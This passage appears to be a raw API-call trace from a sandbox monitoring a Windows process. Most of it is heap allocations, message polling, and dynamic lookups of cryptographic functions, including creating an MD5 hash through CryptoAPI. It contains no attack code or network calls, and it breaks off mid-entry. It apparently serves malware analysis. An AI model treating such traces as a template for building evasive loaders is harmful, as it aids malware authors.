(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0265.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0265.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0265.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0265.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0265.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0265.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0265.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0265.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0265.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0265.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0265.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0265.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0265.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0265.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0265.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0265.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0265.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0265.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0265.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0265.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0265.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0265.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0265.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0265.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0265.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0265.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0265.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0265.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0265.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0265.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0265.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0265.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0265.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69a88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0265.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0265.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0265.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0265.996] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0265.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0265.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0265.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0265.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0265.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0265.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0265.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0265.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e698c8 [0265.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e698c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0265.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0265.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0265.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0265.996] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0265.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0265.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0265.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0265.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0265.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0265.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0265.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0265.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0265.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0265.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0265.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0265.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0265.997] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0265.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14f50 [0265.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0265.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0265.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0265.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0265.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0265.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0265.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0265.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0265.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0265.999] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.999] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.999] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0265.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0265.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.999] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.000] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0266.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0266.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0266.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0266.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0266.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0266.000] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0266.000] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0266.000] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.000] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0266.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0266.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.001] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.001] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0266.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0266.001] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.001] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.001] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.001] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.001] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0266.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0266.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0266.002] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.002] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.002] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.002] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.002] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.002] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.002] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0266.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0266.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.003] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.003] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0266.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0266.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.003] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0266.003] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0266.003] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.003] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0266.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0266.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.004] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0266.004] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0266.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0266.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0266.004] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.004] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.004] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.004] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0266.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0266.004] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0266.005] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0266.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0266.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.005] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0266.005] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0266.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51c70, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0266.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0266.006] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0266.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0266.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0266.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0266.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0266.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0266.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0266.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55308 [0266.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0266.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0266.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0266.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0266.006] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0266.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14488 [0266.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0266.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0266.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0266.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0266.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0266.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0266.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0266.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0266.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0266.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0266.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0266.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0266.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0266.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0266.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0266.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0266.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0266.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0266.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0266.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0266.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0266.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0266.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0266.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0266.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0266.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0266.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0266.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0266.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0266.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0266.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0266.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0266.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0266.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551d8 [0266.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0266.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551d8 | out: hHeap=0x970000) returned 1 [0266.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: 